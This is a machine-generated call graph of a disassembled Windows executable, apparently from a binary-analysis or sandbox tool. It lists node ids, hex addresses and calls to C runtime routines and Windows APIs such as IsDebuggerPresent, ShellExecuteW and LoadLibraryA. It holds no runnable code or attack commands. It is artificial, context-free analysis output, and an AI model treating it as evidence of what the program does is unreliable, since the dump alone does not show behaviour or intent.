83683 422370 83682->83683 83684 422374 83682->83684 83683->83612 83685 416fb6 __malloc_crt 67 API calls 83684->83685 83686 422395 _realloc 83685->83686 83687 42239c FreeEnvironmentStringsW 83686->83687 83687->83612 83689 4222e6 _wparse_cmdline 83688->83689 83690 416fb6 __malloc_crt 67 API calls 83689->83690 83691 422329 _wparse_cmdline 83689->83691 83690->83691 83691->83614 83693 42209a _wcslen 83692->83693 83695 416267 83692->83695 83694 416ffb __calloc_crt 67 API calls 83693->83694 83697 4220be _wcslen 83694->83697 83695->83619 83738 4117af 67 API calls 3 library calls 83695->83738 83696 422123 83698 413a88 ___crtsetenv 67 API calls 83696->83698 83697->83695 83697->83696 83699 416ffb __calloc_crt 67 API calls 83697->83699 83700 422149 83697->83700 83703 422108 83697->83703 83774 426349 67 API calls _wcsftime_l_stat 83697->83774 83698->83695 83699->83697 83702 413a88 ___crtsetenv 67 API calls 83700->83702 83702->83695 83703->83697 83775 417d93 10 API calls 3 library calls 83703->83775 83706 41187c __IsNonwritableInCurrentImage 83705->83706 83776 418486 83706->83776 83708 41189a __initterm_e 83709 411421 __cinit 74 API calls 83708->83709 83710 4118b9 __IsNonwritableInCurrentImage __initterm 83708->83710 83709->83710 83710->83622 83712 431bcb 83711->83712 83713 40d80c 83711->83713 83714 4092c0 VariantClear 83713->83714 83715 40d847 83714->83715 83780 40eb50 83715->83780 83718 40d877 83783 411ac6 67 API calls 4 library calls 83718->83783 83721 40d888 83784 411b24 67 API calls _wcsftime_l_stat 83721->83784 83723 40d891 83785 40f370 SystemParametersInfoW SystemParametersInfoW 83723->83785 83725 40d89f 83786 40d6d0 GetCurrentDirectoryW 83725->83786 83727 40d8a7 SystemParametersInfoW 83728 40d8d4 83727->83728 83729 40d8cd FreeLibrary 83727->83729 83730 4092c0 VariantClear 83728->83730 83729->83728 83731 40d8dd 83730->83731 83732 4092c0 VariantClear 83731->83732 83733 40d8e6 83732->83733 83733->83627 83740 411a1f 67 API calls _doexit 83733->83740 83734->83600 83735->83604 83736->83611 83737->83615 83738->83619 83739->83624 83740->83627 83741->83630 83742->83641 83743->83647 83744->83657 83748 417004 83745->83748 83747 416f70 83747->83636 83747->83662 83748->83747 83749 417022 Sleep 83748->83749 83753 422452 83748->83753 83750 417037 83749->83750 83750->83747 83750->83748 83751->83666 83752->83643 83754 42245e __msize 83753->83754 83755 422476 83754->83755 83765 422495 _memset 83754->83765 83766 417f23 67 API calls __getptd_noexit 83755->83766 83757 42247b 83767 417ebb 6 API calls 2 library calls 83757->83767 83759 422507 HeapAlloc 83759->83765 83760 42248b __msize 83760->83748 83762 418407 __lock 66 API calls 83762->83765 83765->83759 83765->83760 83765->83762 83768 41a74c 5 API calls 2 library calls 83765->83768 83769 42254e LeaveCriticalSection _doexit 83765->83769 83770 411afc 6 API calls __decode_pointer 83765->83770 83766->83757 83768->83765 83769->83765 83770->83765 83771->83669 83772->83676 83773->83677 83774->83697 83775->83703 83777 41848c 83776->83777 83778 41696e __encode_pointer 6 API calls 83777->83778 83779 4184a4 83777->83779 83778->83777 83779->83708 83824 40eb70 83780->83824 83783->83721 83784->83723 83785->83725 83828 401f80 83786->83828 83788 40d6f1 IsDebuggerPresent 83789 431a9d MessageBoxA 83788->83789 83790 40d6ff 83788->83790 83791 431ab6 83789->83791 83790->83791 83792 40d71f 83790->83792 83930 403e90 75 API calls 3 library calls 83791->83930 83898 40f3b0 83792->83898 83796 40d73a GetFullPathNameW 83928 401440 127 API calls _wcscat 83796->83928 83798 40d77a 83799 40d782 83798->83799 83801 431b09 SetCurrentDirectoryW 83798->83801 83800 40d78b 83799->83800 83931 43604b 6 API calls 83799->83931 83910 4101f0 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 83800->83910 83801->83799 83804 431b28 83804->83800 83806 431b30 GetModuleFileNameW 83804->83806 83808 431ba4 GetForegroundWindow ShellExecuteW 83806->83808 83809 431b4c 83806->83809 83812 40d7c7 83808->83812 83932 401b70 83809->83932 83810 40d795 83818 40d7a8 83810->83818 83918 40e1e0 83810->83918 83816 40d7d1 SetCurrentDirectoryW 83812->83816 83816->83727 83817 431b66 83939 40d3b0 75 API calls 2 library calls 83817->83939 83818->83812 83929 401000 Shell_NotifyIconW _memset 83818->83929 83821 431b72 GetForegroundWindow ShellExecuteW 83822 431b9f 83821->83822 83822->83812 83823 40eba0 LoadLibraryA GetProcAddress 83823->83718 83825 40d86e 83824->83825 83826 40eb76 LoadLibraryA 83824->83826 83825->83718 83825->83823 83826->83825 83827 40eb87 GetProcAddress 83826->83827 83827->83825 83940 40e680 83828->83940 83832 401fa2 GetModuleFileNameW 83958 40ff90 83832->83958 83834 401fbd 83970 4107b0 83834->83970 83837 401b70 75 API calls 83838 401fe4 83837->83838 83973 4019e0 83838->83973 83840 401ff2 83841 4092c0 VariantClear 83840->83841 83842 402002 83841->83842 83843 401b70 75 API calls 83842->83843 83844 40201c 83843->83844 83845 4019e0 76 API calls 83844->83845 83846 40202c 83845->83846 83847 401b70 75 API calls 83846->83847 83848 40203c 83847->83848 83981 40c3e0 83848->83981 83850 40204d 83851 40c060 75 API calls 83850->83851 83852 402061 83851->83852 83999 401a70 83852->83999 83854 40206e 84006 4115d0 83854->84006 83857 42c174 83859 401a70 75 API calls 83857->83859 83858 402088 83860 4115d0 __wcsicoll 79 API calls 83858->83860 83861 42c189 83859->83861 83862 402093 83860->83862 83864 401a70 75 API calls 83861->83864 83862->83861 83863 40209e 83862->83863 83865 4115d0 __wcsicoll 79 API calls 83863->83865 83866 42c1a7 83864->83866 83867 4020a9 83865->83867 83868 42c1b0 GetModuleFileNameW 83866->83868 83867->83868 83869 4020b4 83867->83869 83871 401a70 75 API calls 83868->83871 83870 4115d0 __wcsicoll 79 API calls 83869->83870 83872 4020bf 83870->83872 83873 42c1e2 83871->83873 83874 402107 83872->83874 83878 401a70 75 API calls 83872->83878 83883 42c20a _wcscpy 83872->83883 84018 40df50 75 API calls 83873->84018 83877 402119 83874->83877 83874->83883 83876 42c1f1 83879 401a70 75 API calls 83876->83879 83880 42c243 83877->83880 84014 40e7e0 76 API calls 83877->84014 83881 4020e5 _wcscpy 83878->83881 83882 42c201 83879->83882 83889 401a70 75 API calls 83881->83889 83882->83883 83885 401a70 75 API calls 83883->83885 83896 402148 83885->83896 83886 402132 84015 40d030 76 API calls 83886->84015 83888 40213e 83890 4092c0 VariantClear 83888->83890 83889->83874 83890->83896 83892 402184 83894 4092c0 VariantClear 83892->83894 83897 402196 ctype 83894->83897 83895 401a70 75 API calls 83895->83896 83896->83892 83896->83895 84016 40d030 76 API calls 83896->84016 84017 40e640 76 API calls 83896->84017 83897->83788 83899 42ccf4 _memset 83898->83899 83900 40f3c9 83898->83900 83903 42cd05 GetOpenFileNameW 83899->83903 84700 40ffb0 76 API calls ctype 83900->84700 83902 40f3d2 84701 410130 SHGetMalloc 83902->84701 83903->83900 83905 40d732 83903->83905 83905->83796 83905->83798 83906 40f3d9 84706 410020 88 API calls __wcsicoll 83906->84706 83908 40f3e7 84707 40f400 83908->84707 83911 42b9d3 83910->83911 83912 41025a LoadImageW RegisterClassExW 83910->83912 84752 443e8f EnumResourceNamesW LoadImageW 83911->84752 84751 4102f0 7 API calls 83912->84751 83915 40d790 83917 4103e0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 83915->83917 83916 42b9da 83917->83810 83920 40e207 _memset 83918->83920 83919 40e262 83922 40e2a4 83919->83922 84775 43737d 84 API calls __wcsicoll 83919->84775 83920->83919 83921 42aa14 DestroyIcon 83920->83921 83921->83919 83924 40e2c0 Shell_NotifyIconW 83922->83924 83925 42aa50 Shell_NotifyIconW 83922->83925 84753 401be0 83924->84753 83927 40e2da 83927->83818 83928->83798 83929->83812 83930->83798 83931->83804 83933 401b76 _wcslen 83932->83933 83934 41171a 75 API calls 83933->83934 83937 401bc5 83933->83937 83935 401bad _realloc 83934->83935 83936 41171a 75 API calls 83935->83936 83936->83937 83938 40d3b0 75 API calls 2 library calls 83937->83938 83938->83817 83939->83821 83941 40c060 75 API calls 83940->83941 83942 401f90 83941->83942 83943 402940 83942->83943 83944 40294a __write_nolock 83943->83944 84019 4021e0 83944->84019 83947 402972 83949 4029a4 83947->83949 84031 401cf0 83947->84031 83948 402ae0 75 API calls 83948->83949 83949->83948 83950 402a8c 83949->83950 83953 401b70 75 API calls 83949->83953 83956 401cf0 75 API calls 83949->83956 84034 40d970 75 API calls 2 library calls 83949->84034 83951 402abe 83950->83951 83952 401b70 75 API calls 83950->83952 83951->83832 83951->83951 83954 402ab3 83952->83954 83953->83949 84035 40d970 75 API calls 2 library calls 83954->84035 83956->83949 84037 40f5e0 83958->84037 83961 40ffa6 83961->83834 83963 42b6d8 83964 42b6e6 83963->83964 84093 434fe1 83963->84093 83966 413a88 ___crtsetenv 67 API calls 83964->83966 83967 42b6f5 83966->83967 83968 434fe1 106 API calls 83967->83968 83969 42b702 83968->83969 83969->83834 83971 41171a 75 API calls 83970->83971 83972 401fd6 83971->83972 83972->83837 83974 401a03 83973->83974 83975 4019e5 83973->83975 83974->83975 83976 401a1a 83974->83976 83978 4019ff 83975->83978 84688 404260 76 API calls 83975->84688 84689 404260 76 API calls 83976->84689 83978->83840 83980 401a26 83980->83840 83982 40c3e4 83981->83982 83983 40c42c 83981->83983 83984 40c3f0 83982->83984 83985 42a475 83982->83985 83986 42a422 83983->83986 83987 40c435 83983->83987 84690 4042f0 75 API calls __cinit 83984->84690 84695 453155 75 API calls 83985->84695 83989 42a427 83986->83989 83990 42a445 83986->83990 83991 40c441 83987->83991 83997 42a455 83987->83997 83994 40c3fb 83989->83994 84692 453155 75 API calls 83989->84692 84693 453155 75 API calls 83990->84693 84691 4042f0 75 API calls __cinit 83991->84691 83994->83850 84694 453155 75 API calls 83997->84694 84000 401a90 83999->84000 84001 401a77 83999->84001 84003 4021e0 75 API calls 84000->84003 84002 401a8d 84001->84002 84696 404080 75 API calls _realloc 84001->84696 84002->83854 84005 401a9c 84003->84005 84005->83854 84007 4115e1 84006->84007 84008 411650 84006->84008 84013 40207d 84007->84013 84697 417f23 67 API calls __getptd_noexit 84007->84697 84699 4114bf 79 API calls 3 library calls 84008->84699 84011 4115ed 84698 417ebb 6 API calls 2 library calls 84011->84698 84013->83857 84013->83858 84014->83886 84015->83888 84016->83896 84017->83896 84018->83876 84020 4021f1 _wcslen 84019->84020 84021 42a598 84019->84021 84024 402205 84020->84024 84025 402226 84020->84025 84022 40c740 75 API calls 84021->84022 84023 42a5a2 84022->84023 84036 404020 75 API calls ctype 84024->84036 84027 401380 75 API calls 84025->84027 84029 40222d 84027->84029 84028 40220c _realloc 84028->83947 84029->84023 84030 41171a 75 API calls 84029->84030 84030->84028 84032 402ae0 75 API calls 84031->84032 84033 401cf7 84032->84033 84033->83947 84034->83949 84035->83951 84036->84028 84038 40f580 77 API calls 84037->84038 84039 40f5f8 _strcat ctype 84038->84039 84097 40f6d0 84039->84097 84044 42b2ee 84126 4151b0 84044->84126 84046 40f679 84046->84044 84047 40f681 84046->84047 84113 414e94 84047->84113 84051 40f68b 84051->83961 84056 452574 84051->84056 84053 42b31d 84132 415484 84053->84132 84055 42b33d 84057 41557c _fseek 105 API calls 84056->84057 84058 4525df 84057->84058 84633 4523ce 84058->84633 84061 4525fc 84061->83963 84062 4151b0 __fread_nolock 81 API calls 84063 45261d 84062->84063 84064 4151b0 __fread_nolock 81 API calls 84063->84064 84065 45262e 84064->84065 84066 4151b0 __fread_nolock 81 API calls 84065->84066 84067 452649 84066->84067 84068 4151b0 __fread_nolock 81 API calls 84067->84068 84069 452666 84068->84069 84070 41557c _fseek 105 API calls 84069->84070 84071 452682 84070->84071 84072 4138ba _malloc 67 API calls 84071->84072 84073 45268e 84072->84073 84074 4138ba _malloc 67 API calls 84073->84074 84075 45269b 84074->84075 84076 4151b0 __fread_nolock 81 API calls 84075->84076 84077 4526ac 84076->84077 84078 44afdc GetSystemTimeAsFileTime 84077->84078 84079 4526bf 84078->84079 84080 4526d5 84079->84080 84081 4526fd 84079->84081 84082 413a88 ___crtsetenv 67 API calls 84080->84082 84083 452704 84081->84083 84084 45275b 84081->84084 84085 4526df 84082->84085 84639 44b195 84083->84639 84087 413a88 ___crtsetenv 67 API calls 84084->84087 84088 413a88 ___crtsetenv 67 API calls 84085->84088 84090 452759 84087->84090 84091 4526e8 84088->84091 84089 452753 84092 413a88 ___crtsetenv 67 API calls 84089->84092 84090->83963 84091->83963 84092->84090 84094 434ff1 84093->84094 84095 434feb 84093->84095 84094->83964 84096 414e94 __fcloseall 106 API calls 84095->84096 84096->84094 84098 40f6dd _strlen 84097->84098 84145 40f790 84098->84145 84101 414e06 84164 414d40 84101->84164 84103 40f666 84103->84044 84104 40f450 84103->84104 84108 40f45a _strcat _realloc __write_nolock 84104->84108 84105 4151b0 __fread_nolock 81 API calls 84105->84108 84107 42936d 84109 41557c _fseek 105 API calls 84107->84109 84108->84105 84108->84107 84112 40f531 84108->84112 84247 41557c 84108->84247 84110 429394 84109->84110 84111 4151b0 __fread_nolock 81 API calls 84110->84111 84111->84112 84112->84046 84114 414ea0 __msize 84113->84114 84115 414ed1 84114->84115 84116 414eb4 84114->84116 84118 415965 __lock_file 68 API calls 84115->84118 84122 414ec9 __msize 84115->84122 84386 417f23 67 API calls __getptd_noexit 84116->84386 84120 414ee9 84118->84120 84119 414eb9 84387 417ebb 6 API calls 2 library calls 84119->84387 84370 414e1d 84120->84370 84122->84051 84455 41511a 84126->84455 84128 4151c8 84129 44afdc 84128->84129 84626 4431e0 84129->84626 84131 44affd 84131->84053 84133 415490 __msize 84132->84133 84134 4154bb 84133->84134 84135 41549e 84133->84135 84137 415965 __lock_file 68 API calls 84134->84137 84630 417f23 67 API calls __getptd_noexit 84135->84630 84139 4154c3 84137->84139 84138 4154a3 84631 417ebb 6 API calls 2 library calls 84138->84631 84141 4152e7 __ftell_nolock 71 API calls 84139->84141 84142 4154cf 84141->84142 84632 4154e8 LeaveCriticalSection LeaveCriticalSection __wfsopen 84142->84632 84144 4154b3 __msize 84144->84055 84147 40f7ae _memset 84145->84147 84148 40f628 84147->84148 84149 415258 84147->84149 84148->84101 84150 415285 84149->84150 84151 415268 84149->84151 84150->84151 84153 41528c 84150->84153 84160 417f23 67 API calls __getptd_noexit 84151->84160 84162 41c551 103 API calls 14 library calls 84153->84162 84154 41526d 84161 417ebb 6 API calls 2 library calls 84154->84161 84157 4152b2 84158 41527d 84157->84158 84163 4191c9 101 API calls 7 library calls 84157->84163 84158->84147 84160->84154 84162->84157 84163->84158 84165 414d4c __msize 84164->84165 84166 414d5f 84165->84166 84169 414d95 84165->84169 84216 417f23 67 API calls __getptd_noexit 84166->84216 84168 414d64 84217 417ebb 6 API calls 2 library calls 84168->84217 84183 41e28c 84169->84183 84172 414d9a 84173 414da1 84172->84173 84174 414dae 84172->84174 84218 417f23 67 API calls __getptd_noexit 84173->84218 84176 414dd6 84174->84176 84177 414db6 84174->84177 84201 41dfd8 84176->84201 84219 417f23 67 API calls __getptd_noexit 84177->84219 84182 414d74 __msize @_EH4_CallFilterFunc@8 84182->84103 84184 41e298 __msize 84183->84184 84185 418407 __lock 67 API calls 84184->84185 84196 41e2a6 84185->84196 84186 41e31b 84221 41e3bb 84186->84221 84187 41e322 84189 416fb6 __malloc_crt 67 API calls 84187->84189 84191 41e32c 84189->84191 84190 41e3b0 __msize 84190->84172 84191->84186 84226 4189e6 InitializeCriticalSectionAndSpinCount __msize 84191->84226 84194 418344 __mtinitlocknum 67 API calls 84194->84196 84195 41e351 84197 41e35c 84195->84197 84198 41e36f EnterCriticalSection 84195->84198 84196->84186 84196->84187 84196->84194 84224 4159a6 68 API calls __lock 84196->84224 84225 415a14 LeaveCriticalSection LeaveCriticalSection _doexit 84196->84225 84199 413a88 ___crtsetenv 67 API calls 84197->84199 84198->84186 84199->84186 84210 41dffb __wopenfile 84201->84210 84202 41e015 84231 417f23 67 API calls __getptd_noexit 84202->84231 84203 41e1e9 84203->84202 84207 41e247 84203->84207 84205 41e01a 84232 417ebb 6 API calls 2 library calls 84205->84232 84228 425db0 84207->84228 84210->84202 84210->84203 84233 4136bc 79 API calls 2 library calls 84210->84233 84212 41e1e2 84212->84203 84234 4136bc 79 API calls 2 library calls 84212->84234 84214 41e201 84214->84203 84235 4136bc 79 API calls 2 library calls 84214->84235 84216->84168 84218->84182 84219->84182 84220 414dfc LeaveCriticalSection LeaveCriticalSection __wfsopen 84220->84182 84227 41832d LeaveCriticalSection 84221->84227 84223 41e3c2 84223->84190 84224->84196 84225->84196 84226->84195 84227->84223 84236 425ce4 84228->84236 84230 414de1 84230->84220 84231->84205 84233->84212 84234->84214 84235->84203 84237 425cf0 __msize 84236->84237 84238 425d03 84237->84238 84241 425d41 84237->84241 84239 417f23 _wcsftime_l_stat 67 API calls 84238->84239 84240 425d08 84239->84240 84242 417ebb _wcsftime_l_stat 6 API calls 84240->84242 84243 4255c4 __tsopen_nolock 132 API calls 84241->84243 84246 425d17 __msize 84242->84246 84244 425d5b 84243->84244 84245 425d82 __sopen_helper LeaveCriticalSection 84244->84245 84245->84246 84246->84230 84250 415588 __msize 84247->84250 84248 415596 84278 417f23 67 API calls __getptd_noexit 84248->84278 84249 4155c4 84260 415965 84249->84260 84250->84248 84250->84249 84253 41559b 84279 417ebb 6 API calls 2 library calls 84253->84279 84259 4155ab __msize 84259->84108 84261 415977 84260->84261 84262 415999 EnterCriticalSection 84260->84262 84261->84262 84264 41597f 84261->84264 84263 4155cc 84262->84263 84266 4154f2 84263->84266 84265 418407 __lock 67 API calls 84264->84265 84265->84263 84267 415512 84266->84267 84268 415502 84266->84268 84273 415524 84267->84273 84281 4152e7 84267->84281 84335 417f23 67 API calls __getptd_noexit 84268->84335 84272 415507 84280 4155f7 LeaveCriticalSection LeaveCriticalSection __wfsopen 84272->84280 84298 41486c 84273->84298 84278->84253 84280->84259 84282 41531a 84281->84282 84283 4152fa 84281->84283 84284 41453a __fileno 67 API calls 84282->84284 84336 417f23 67 API calls __getptd_noexit 84283->84336 84286 415320 84284->84286 84289 41efd4 __locking 71 API calls 84286->84289 84287 4152ff 84337 417ebb 6 API calls 2 library calls 84287->84337 84290 415335 84289->84290 84291 415364 84290->84291 84292 4153a9 84290->84292 84297 41530f 84290->84297 84294 41efd4 __locking 71 API calls 84291->84294 84291->84297 84338 417f23 67 API calls __getptd_noexit 84292->84338 84295 415404 84294->84295 84296 41efd4 __locking 71 API calls 84295->84296 84295->84297 84296->84297 84297->84273 84299 4148a7 84298->84299 84300 414885 84298->84300 84304 41453a 84299->84304 84300->84299 84301 41453a __fileno 67 API calls 84300->84301 84302 4148a0 84301->84302 84339 41c3cf 101 API calls 5 library calls 84302->84339 84305 41455e 84304->84305 84306 414549 84304->84306 84310 41efd4 84305->84310 84340 417f23 67 API calls __getptd_noexit 84306->84340 84308 41454e 84341 417ebb 6 API calls 2 library calls 84308->84341 84311 41efe0 __msize 84310->84311 84312 41f003 84311->84312 84313 41efe8 84311->84313 84315 41f011 84312->84315 84318 41f052 84312->84318 84362 417f36 67 API calls __getptd_noexit 84313->84362 84364 417f36 67 API calls __getptd_noexit 84315->84364 84316 41efed 84363 417f23 67 API calls __getptd_noexit 84316->84363 84342 41ba3b 84318->84342 84320 41f016 84365 417f23 67 API calls __getptd_noexit 84320->84365 84323 41f01d 84366 417ebb 6 API calls 2 library calls 84323->84366 84324 41f058 84326 41f065 84324->84326 84327 41f07b 84324->84327 84352 41ef5f 84326->84352 84367 417f23 67 API calls __getptd_noexit 84327->84367 84328 41eff5 __msize 84328->84272 84331 41f073 84369 41f0a6 LeaveCriticalSection __unlock_fhandle 84331->84369 84332 41f080 84368 417f36 67 API calls __getptd_noexit 84332->84368 84335->84272 84336->84287 84338->84297 84339->84299 84340->84308 84343 41ba47 __msize 84342->84343 84344 41baa2 84343->84344 84347 418407 __lock 67 API calls 84343->84347 84345 41bac4 __msize 84344->84345 84346 41baa7 EnterCriticalSection 84344->84346 84345->84324 84346->84345 84348 41ba73 84347->84348 84349 4189e6 __alloc_osfhnd InitializeCriticalSectionAndSpinCount 84348->84349 84351 41ba8a 84348->84351 84349->84351 84350 41bad2 ___lock_fhandle LeaveCriticalSection 84350->84344 84351->84350 84353 41b9c4 __lseeki64_nolock 67 API calls 84352->84353 84354 41ef6e 84353->84354 84355 41ef84 SetFilePointer 84354->84355 84356 41ef74 84354->84356 84358 41ef9b GetLastError 84355->84358 84360 41efa3 84355->84360 84357 417f23 _wcsftime_l_stat 67 API calls 84356->84357 84359 41ef79 84357->84359 84358->84360 84359->84331 84360->84359 84361 417f49 __dosmaperr 67 API calls 84360->84361 84361->84359 84362->84316 84363->84328 84364->84320 84365->84323 84367->84332 84368->84331 84369->84328 84371 414e31 84370->84371 84372 414e4d 84370->84372 84416 417f23 67 API calls __getptd_noexit 84371->84416 84374 41486c __flush 101 API calls 84372->84374 84384 414e46 84372->84384 84376 414e59 84374->84376 84375 414e36 84417 417ebb 6 API calls 2 library calls 84375->84417 84389 41e680 84376->84389 84380 41453a __fileno 67 API calls 84381 414e67 84380->84381 84393 41e5b3 84381->84393 84383 414e6d 84383->84384 84385 413a88 ___crtsetenv 67 API calls 84383->84385 84388 414f08 LeaveCriticalSection LeaveCriticalSection __wfsopen 84384->84388 84385->84384 84386->84119 84388->84122 84390 41e690 84389->84390 84392 414e61 84389->84392 84391 413a88 ___crtsetenv 67 API calls 84390->84391 84390->84392 84391->84392 84392->84380 84394 41e5bf __msize 84393->84394 84395 41e5e2 84394->84395 84396 41e5c7 84394->84396 84398 41e5f0 84395->84398 84402 41e631 84395->84402 84433 417f36 67 API calls __getptd_noexit 84396->84433 84435 417f36 67 API calls __getptd_noexit 84398->84435 84400 41e5cc 84434 417f23 67 API calls __getptd_noexit 84400->84434 84401 41e5f5 84436 417f23 67 API calls __getptd_noexit 84401->84436 84405 41ba3b ___lock_fhandle 68 API calls 84402->84405 84408 41e637 84405->84408 84406 41e5d4 __msize 84406->84383 84407 41e5fc 84437 417ebb 6 API calls 2 library calls 84407->84437 84410 41e652 84408->84410 84411 41e644 84408->84411 84438 417f23 67 API calls __getptd_noexit 84410->84438 84418 41e517 84411->84418 84414 41e64c 84439 41e676 LeaveCriticalSection __unlock_fhandle 84414->84439 84416->84375 84440 41b9c4 84418->84440 84420 41e57d 84453 41b93e 68 API calls 2 library calls 84420->84453 84422 41e527 84422->84420 84424 41b9c4 __lseeki64_nolock 67 API calls 84422->84424 84432 41e55b 84422->84432 84423 41b9c4 __lseeki64_nolock 67 API calls 84425 41e567 CloseHandle 84423->84425 84428 41e552 84424->84428 84425->84420 84429 41e573 GetLastError 84425->84429 84426 41e585 84427 41e5a7 84426->84427 84454 417f49 67 API calls 3 library calls 84426->84454 84427->84414 84431 41b9c4 __lseeki64_nolock 67 API calls 84428->84431 84429->84420 84431->84432 84432->84420 84432->84423 84433->84400 84434->84406 84435->84401 84436->84407 84438->84414 84439->84406 84441 41b9d1 84440->84441 84442 41b9e9 84440->84442 84443 417f36 __write_nolock 67 API calls 84441->84443 84444 417f36 __write_nolock 67 API calls 84442->84444 84449 41ba2e 84442->84449 84445 41b9d6 84443->84445 84446 41ba17 84444->84446 84447 417f23 _wcsftime_l_stat 67 API calls 84445->84447 84448 417f23 _wcsftime_l_stat 67 API calls 84446->84448 84450 41b9de 84447->84450 84451 41ba1e 84448->84451 84449->84422 84450->84422 84452 417ebb _wcsftime_l_stat 6 API calls 84451->84452 84452->84449 84453->84426 84454->84427 84456 415126 __msize 84455->84456 84457 41516f 84456->84457 84458 415164 __msize 84456->84458 84461 41513a _memset 84456->84461 84459 415965 __lock_file 68 API calls 84457->84459 84458->84128 84460 415177 84459->84460 84468 414f10 84460->84468 84484 417f23 67 API calls __getptd_noexit 84461->84484 84464 415154 84485 417ebb 6 API calls 2 library calls 84464->84485 84469 414f4c 84468->84469 84473 414f2e _memset 84468->84473 84486 4151a6 LeaveCriticalSection LeaveCriticalSection __wfsopen 84469->84486 84470 414f37 84537 417f23 67 API calls __getptd_noexit 84470->84537 84472 414f8b 84472->84469 84476 4150a9 _memset 84472->84476 84477 4150d5 _memset 84472->84477 84479 41453a __fileno 67 API calls 84472->84479 84487 41ed9e 84472->84487 84517 41e6b1 84472->84517 84539 41ee9b 67 API calls 3 library calls 84472->84539 84473->84469 84473->84470 84473->84472 84540 417f23 67 API calls __getptd_noexit 84476->84540 84541 417f23 67 API calls __getptd_noexit 84477->84541 84479->84472 84483 414f3c 84538 417ebb 6 API calls 2 library calls 84483->84538 84484->84464 84486->84458 84488 41edaa __msize 84487->84488 84489 41edb2 84488->84489 84490 41edcd 84488->84490 84611 417f36 67 API calls __getptd_noexit 84489->84611 84492 41eddb 84490->84492 84496 41ee1c 84490->84496 84613 417f36 67 API calls __getptd_noexit 84492->84613 84494 41edb7 84612 417f23 67 API calls __getptd_noexit 84494->84612 84495 41ede0 84614 417f23 67 API calls __getptd_noexit 84495->84614 84499 41ee29 84496->84499 84500 41ee3d 84496->84500 84616 417f36 67 API calls __getptd_noexit 84499->84616 84501 41ba3b ___lock_fhandle 68 API calls 84500->84501 84503 41ee43 84501->84503 84506 41ee50 84503->84506 84507 41ee66 84503->84507 84504 41ede7 84615 417ebb 6 API calls 2 library calls 84504->84615 84505 41ee2e 84617 417f23 67 API calls __getptd_noexit 84505->84617 84542 41e7dc 84506->84542 84618 417f23 67 API calls __getptd_noexit 84507->84618 84512 41edbf __msize 84512->84472 84513 41ee5e 84620 41ee91 LeaveCriticalSection __unlock_fhandle 84513->84620 84514 41ee6b 84619 417f36 67 API calls __getptd_noexit 84514->84619 84518 41e6c1 84517->84518 84519 41e6de 84517->84519 84624 417f23 67 API calls __getptd_noexit 84518->84624 84523 41e713 84519->84523 84529 41e6d6 84519->84529 84621 423600 84519->84621 84521 41e6c6 84625 417ebb 6 API calls 2 library calls 84521->84625 84525 41453a __fileno 67 API calls 84523->84525 84526 41e727 84525->84526 84527 41ed9e __read 79 API calls 84526->84527 84528 41e72e 84527->84528 84528->84529 84530 41453a __fileno 67 API calls 84528->84530 84529->84472 84531 41e751 84530->84531 84531->84529 84532 41453a __fileno 67 API calls 84531->84532 84533 41e75d 84532->84533 84533->84529 84534 41453a __fileno 67 API calls 84533->84534 84535 41e769 84534->84535 84536 41453a __fileno 67 API calls 84535->84536 84536->84529 84537->84483 84539->84472 84540->84483 84541->84483 84543 41e813 84542->84543 84544 41e7f8 84542->84544 84545 41e822 84543->84545 84547 41e849 84543->84547 84546 417f36 __write_nolock 67 API calls 84544->84546 84548 417f36 __write_nolock 67 API calls 84545->84548 84549 41e7fd 84546->84549 84552 41e868 84547->84552 84563 41e87c 84547->84563 84551 41e827 84548->84551 84550 417f23 _wcsftime_l_stat 67 API calls 84549->84550 84564 41e805 84550->84564 84554 417f23 _wcsftime_l_stat 67 API calls 84551->84554 84555 417f36 __write_nolock 67 API calls 84552->84555 84553 41e8d4 84557 417f36 __write_nolock 67 API calls 84553->84557 84556 41e82e 84554->84556 84558 41e86d 84555->84558 84559 417ebb _wcsftime_l_stat 6 API calls 84556->84559 84560 41e8d9 84557->84560 84561 417f23 _wcsftime_l_stat 67 API calls 84558->84561 84559->84564 84565 417f23 _wcsftime_l_stat 67 API calls 84560->84565 84562 41e874 84561->84562 84567 417ebb _wcsftime_l_stat 6 API calls 84562->84567 84563->84553 84563->84564 84566 41e8b0 84563->84566 84568 41e8f5 84563->84568 84564->84513 84565->84562 84566->84553 84571 41e8bb ReadFile 84566->84571 84567->84564 84570 416fb6 __malloc_crt 67 API calls 84568->84570 84572 41e90b 84570->84572 84573 41ed62 GetLastError 84571->84573 84574 41e9e7 84571->84574 84577 41e931 84572->84577 84578 41e913 84572->84578 84575 41ebe8 84573->84575 84576 41ed6f 84573->84576 84574->84573 84581 41e9fb 84574->84581 84586 417f49 __dosmaperr 67 API calls 84575->84586 84592 41eb6d 84575->84592 84579 417f23 _wcsftime_l_stat 67 API calls 84576->84579 84582 423462 __lseeki64_nolock 69 API calls 84577->84582 84580 417f23 _wcsftime_l_stat 67 API calls 84578->84580 84584 41ed74 84579->84584 84585 41e918 84580->84585 84590 41ea17 84581->84590 84591 41ec2d 84581->84591 84581->84592 84583 41e93d 84582->84583 84583->84571 84587 417f36 __write_nolock 67 API calls 84584->84587 84588 417f36 __write_nolock 67 API calls 84585->84588 84586->84592 84587->84592 84588->84564 84589 413a88 ___crtsetenv 67 API calls 84589->84564 84593 41eafa 84590->84593 84594 41ea7d ReadFile 84590->84594 84591->84592 84595 41eca5 ReadFile 84591->84595 84592->84564 84592->84589 84593->84592 84601 41eb75 84593->84601 84602 41eb68 84593->84602 84608 41eb32 84593->84608 84599 41ea9b GetLastError 84594->84599 84603 41eaa5 84594->84603 84596 41ecc4 GetLastError 84595->84596 84597 41ecce 84595->84597 84596->84591 84596->84597 84597->84591 84606 423462 __lseeki64_nolock 69 API calls 84597->84606 84598 41ebbe MultiByteToWideChar 84598->84592 84600 41ebe2 GetLastError 84598->84600 84599->84590 84599->84603 84600->84575 84607 41ebac 84601->84607 84601->84608 84604 417f23 _wcsftime_l_stat 67 API calls 84602->84604 84603->84590 84605 423462 __lseeki64_nolock 69 API calls 84603->84605 84604->84592 84605->84603 84606->84597 84609 423462 __lseeki64_nolock 69 API calls 84607->84609 84608->84598 84610 41ebbb 84609->84610 84610->84598 84611->84494 84612->84512 84613->84495 84614->84504 84616->84505 84617->84504 84618->84514 84619->84513 84620->84512 84622 416fb6 __malloc_crt 67 API calls 84621->84622 84623 423615 84622->84623 84623->84523 84624->84521 84629 414cef GetSystemTimeAsFileTime __aulldiv 84626->84629 84628 4431ef 84628->84131 84629->84628 